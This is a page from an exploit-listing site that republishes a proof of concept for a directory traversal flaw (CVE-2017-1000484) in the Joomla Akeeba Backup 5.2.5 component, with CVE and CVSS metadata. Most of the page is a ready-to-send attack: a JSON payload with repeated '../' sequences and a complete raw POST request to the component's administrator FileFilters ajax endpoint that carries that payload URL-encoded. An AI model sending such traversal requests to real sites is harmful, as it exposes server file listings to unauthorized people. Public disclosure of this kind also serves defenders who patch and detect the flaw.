Advertisement






Joomla Component Akeeba Backup 5.2.5 - Directory Traversal

CVE Category Price Severity
CVE-2017-1000484 CWE-22 $500 High
Author Risk Exploitation Type Date
Unknown Critical Remote 2017-03-07
CPE
cpe:cpe:/a:joomla:akeeba_backup:5.2.5
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017030072

Below is a copy:

Joomla Component Akeeba Backup 5.2.5 - Directory Traversal# Exploit Title: Joomla Component Akeeba Backup 5.2.5 - Directory Traversal
# Date: 2017-03-07
# Home : https://extensions.joomla.org/extensions/extension/access-a-security/site-security/akeeba-backup/
# Version :  Akeeba Backup Core 5.3.0.b1 (2017-02-22) 
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM ([email protected])
# Home : http://persian-team.ir/
# Telegram Channel AND Demo: @PersianHackTeam

 
POC :
1)Include and Exclude Information Section
2)Click on Files and Directories Exclusion
3)Subdirectories
4)Post action Parameter Encode as Url : {"root":"[SITEROOT]","node":"../../../../../../../","verb":"list"} 

Request : 

POST /joomla/administrator/index.php?option=com_akeeba&view=FileFilters&task=ajax HTTP/1.1
Host: 192.168.1.11
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.1.11/joomla/administrator/index.php?option=com_akeeba&view=FileFilters
Content-Length: 154
Cookie: 8924dd79f450c03ec0748f316908b847=vod11einhb2gaelq1um1jsje66
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

action=%7b%22%72%6f%6f%74%22%3a%22%5b%53%49%54%45%52%4f%4f%54%5d%22%2c%22%6e%6f%64%65%22%3a%22%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%22%2c%22%76%65%72%62%22%3a%22%6c%69%73%74%22%7d&_cacheBustingJunk=0.04

 
# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
# Iranian white hat Hackers


Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.